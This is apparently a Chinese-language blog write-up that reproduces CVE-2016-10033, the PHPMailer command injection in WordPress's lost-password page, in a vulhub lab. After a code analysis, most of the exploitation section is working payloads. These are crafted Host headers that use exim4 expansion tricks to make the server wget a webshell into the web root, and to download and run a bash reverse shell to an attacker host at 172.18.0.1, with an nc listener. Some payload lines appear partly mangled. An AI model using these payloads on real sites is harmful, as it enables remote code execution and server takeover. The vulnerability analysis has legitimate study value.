WordPress命令执行

精彩的不是利用，而是不断的突破，看了别人的思路受益匪浅。

0x01漏洞信息

这个锅还是要PHPMailer背（CVE-2016-10033,WordPress使用PHPMailer组件向用户发送邮件。PHPMailer(版本

0x02漏洞编号

CVE-2016-10033

https://paper.seebug.org/161/

0x03影响版本

WordPress

PHPMailer

0x04复现环境

https://github.com/vulhub/vulhub/tree/master/wordpress/pwnscriptum

0x05漏洞分析

漏洞出现在管理员的密码重置界面/wp-login.php?action=lostpassword

在找回密码时WordPress会使用PHPmailer发送重置密码的邮件，这个时候PHPmailer

打开/wp-includes/class-phpmailer.php中

public $Mailer = 'mail';

/**

* The path to the sendmail program.

* @var string

*/

public $Sendmail = '/usr/sbin/sendmail';

由代码可以看出PHPmailer调用的是/usr/sbin/semdmail来发送邮件的。

发送邮件的命令格式为:sendmail -t -i -fusername@hostname

/**

* Get the server hostname.

* Returns 'localhost.localdomain' if unknown.

* @access protected

* @return string

*/

protected function serverHostname()

{

$result = 'localhost.localdomain';

if (!empty($this->Hostname)) {

$result = $this->Hostname;

} elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {

$result = $_SERVER['SERVER_NAME'];

} elseif (function_exists('gethostname') && gethostname() !== false) {

$result = gethostname();

} elseif (php_uname('n') !== false) {

$result = php_uname('n');

}

return $result;

}

serverHostname函数通过传入的SERVER_NAME参数来获取主机名，该主机名即HTTP请求报文中的host值，但是SERVER_NAME参数并没有经过任何过滤，因此我们可以进行任意构造拼接，从而产生了系统命令注入漏洞。

sendmail提供了-O和-X参数。-OQueueDirectory=/tmp/ -X/tmp/aaa.php,它会将发送的邮件保存到/tmp/aaa.php中。

因此我们可以构造以下payload:

POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1

Host: aaa( -X/tmp/aaa.php )@qq.com

这里Host字段值中@符号前用了一个”( )”,这样可以直接在括号中使用空格.

具体大家可以看P神博客的两篇文章。

https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html

https://www.leavesongs.com/PENETRATION/how-to-analyze-long-regex.html

但是由于WordPress以及PHPMailer都会防止攻击者注入空字符。并且host字段值中出现’/'会出现请求错误。

可以看到在ubuntu中已经使用exim4替代了sendmail的功能。

root@990b6f7e34bb:/var/www/html/wp-includes# which sendmail

/usr/sbin/sendmail

root@990b6f7e34bb:/var/www/html/wp-includes# file /usr/sbin/sendmail

/usr/sbin/sendmail: symbolic link to `exim4'

在exim4中有一个-be参数可以读取一些变量的数据：

root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$tod_log'

2018-08-23 10:22:21

root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$spool_directory'

/var/spool/exim4

exim4还支持一些函数用来执行一些命令：

root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$spool_directory'

/var/spool/exim4

root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '${$spool_directory}}'

/

从第一个字符开始截取，然后截取长度为1,刚好可以把’/’截取出来

因此我们可以将：

空格—> ${$tod_log}}

/ —> ${$spool_directory}}

$run还可以调用系统命令：

root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$}'

uid=0(root) gid=105(Debian-exim) groups=0(root)

比如我们此时想执行在/tmp下创建一个test.php

aa(any -froot@localhost -be $} null)

aa(any -froot@localhost -be ${$spool_directory}}bin${$spool_directory}}touch${$tod_log}}${$spool_directory}}tmp${$spool_directory}}test.php}} null)

此时在重置密码处输入用户名admin，然后使用BurpSuite抓包拦截，修改host的值：

在/tmp下文件创建成功。

root@990b6f7e34bb:/tmp# ls -al

total 8

drwxrwxrwt 1 root root 4096 Aug 23 10:46 .

drwxr-xr-x 1 root root 4096 Aug 23 08:48 ..

-rw—---- 1 www-data www-data 0 Aug 23 10:44 test.php

实际利用的过程中还需要注意一下几点：

[]执行的命令不能包含大量特殊字符比如：、引号等等。[/] []命令会被转换为小写字母[/] []命令需要使用绝对路径[/] []需要知道一个存在的用户名，比如admin.[/]

0x06实战利用

一、写webshell

场景描述：

攻击机器IP: 172.18.0.1

目标靶机IP: 172.18.0.3

攻击机器开启web服务，172.18.0.1/zk/one.txt内容如下：

利用步骤：

1、发送payload使目标靶机下载one.txt，并保存到web根目录下/var/www/html/shell.php

2、使用菜刀链接shell.php

1、下载one.txt

aa(any -froot@localhost -be $} null)

aa(any -froot@localhost -be ${$spool_directory}}usr${$spool_directory}}bin${$spool_directory}}wget${$tod_log}}--output-document${$tod_log}}${$spool_directory}}var${$spool_directory}}www${$spool_directory}}html${$spool_directory}}shell.php${$tod_log}}172.18.0.1${$spool_directory}}zk${$spool_directory}}one.txt}} null)

2、使用菜刀链接：

二、反弹shell

场景描述：

攻击机器IP: 172.18.0.1

目标靶机IP: 172.18.0.3

攻击机器开启web服务，172.18.0.1/zk/shell.txt内容如下：

bash -i >& /dev/tcp/172.18.0.1/7001 0>&1

利用步骤：

1、发送payload使靶机下载shell.txt，并保存到/tmp/shell

2、在攻击机器上使用nc监听7001端口

3、发送payload使靶机运行shell

注意：远程URL中不能有http://，并且所有字母必须小写。

1、下载远程服务器上的脚本文件payload:

aa(any -froot@localhost -be $} null)

aa(any -froot@localhost -be ${$spool_directory}}usr${$spool_directory}}bin${$spool_directory}}wget${$tod_log}}--output-document${$tod_log}}${$spool_directory}}tmp${$spool_directory}}shell${$tod_log}}172.18.0.1${$spool_directory}}zk${$spool_directory}}shell.txt}} null)

2、在172.18.0.1上执行nc -lvp 7001开启监听：

3、发送payload使靶机运行shel：

aa(any -froot@localhost -be $} null)

aa(any -froot@localhost -be ${$spool_directory}}bin${$spool_directory}}bash${$tod_log}}${$spool_directory}}tmp${$spool_directory}}shell}} null)

Reference

https://github.com/vulhub/vulhub/tree/master/wordpress/pwnscriptum

https://www.cnblogs.com/ssooking/p/8893264.html

https://www.leavesongs.com/PENETRATION/how-to-analyze-long-regex.html

https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html

https://paper.seebug.org/161/